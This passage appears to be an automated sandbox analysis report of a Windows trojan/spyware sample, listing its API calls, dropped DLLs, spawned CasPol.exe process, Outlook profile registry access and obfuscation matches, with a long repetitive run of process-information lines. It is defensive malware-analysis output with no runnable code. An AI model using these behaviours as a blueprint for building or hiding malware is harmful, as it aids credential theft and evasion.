            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032C0976 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032C2463 LoadLibraryA,NtProtectVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D3CAFDA NtQuerySystemInformation,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D3CAFB8 NtQuerySystemInformation,
            Source: lang-1034.dll.1.drStatic PE information: No import functions for PE file found
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HttpSigUpdate_BaseUrlhttps://go.microsoft.com/fwlink/?LinkID=851034&clcid=0x409&https://go.microsoft.com/fwlink/?LinkID=870379&clcid=0x409&%lsarch=%ls&eng=%ls&avdelta=%ls&asdelta=%ls&prod=%ls&ostype=%u&signaturetype=%u&beta=%u&plat=%lsHttpSigUpdate_UrlSignatureTypeMiscellaneous ConfigurationBddUpdateFailureProductGUIDMpGradualEngineReleaseMpEnginePreventPlatformUpdateRunAsInvoker__COMPAT_LAYEROfflineTargetOS%ls\temp%ls\mpam-%x.exeFileDescriptionAntiMalware Definition UpdateMicrosoft Malware ProtectionProductNameUpdatePlatform.EXEOriginalFilename%lsMpService_NoLowPriUpdateHttpSigUpdate_StubTimeoutx86ia64armarm64 vs SecuriteInfo.com.generic.ml.22865.exe
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMpCommu.dllj% vs SecuriteInfo.com.generic.ml.22865.exe
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreetype.libD vs SecuriteInfo.com.generic.ml.22865.exe
            Source: SecuriteInfo.com.generic.ml.22865.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/16@2/2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: SecuriteInfo.com.generic.ml.22865.exeVirustotal: Detection: 8%
            Source: SecuriteInfo.com.generic.ml.22865.exeReversingLabs: Detection: 19%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D3CAAB6 AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D3CAA7F AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile created: C:\Users\user\AppData\Local\Temp\nsw143E.tmpJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_004021AA CoCreateInstance,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile written: C:\Users\user\AppData\Local\Temp\analysekapitlet.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\spndingsfejlenJump to behavior
            Source: SecuriteInfo.com.generic.ml.22865.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: MpCommu.pdb source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr
            Source: Binary string: MpCommu.pdbUGP source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000004.00000000.9599862786.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.9740495232.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_716A30C0 push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B3648 pushfd ; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B2D62 push edx; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA99F push eax; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA9FD push eax; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D3C2EF8 pushfd ; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D4AB38A push esp; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1FF14D88 push ebx; mov dword ptr [esp], eax
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1FF15559 push ebx; mov dword ptr [esp], eax
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_716A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: libfreetype-6.dll.1.drStatic PE information: section name: .xdata
            Source: libpcre-1.dll.1.drStatic PE information: section name: .xdata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile created: C:\Users\user\AppData\Local\Temp\libpcre-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile created: C:\Users\user\AppData\Local\Temp\nsr150B.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile created: C:\Users\user\AppData\Local\Temp\MpCommu.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile created: C:\Users\user\AppData\Local\Temp\lang-1034.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeFile created: C:\Users\user\AppData\Local\Temp\libfreetype-6.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
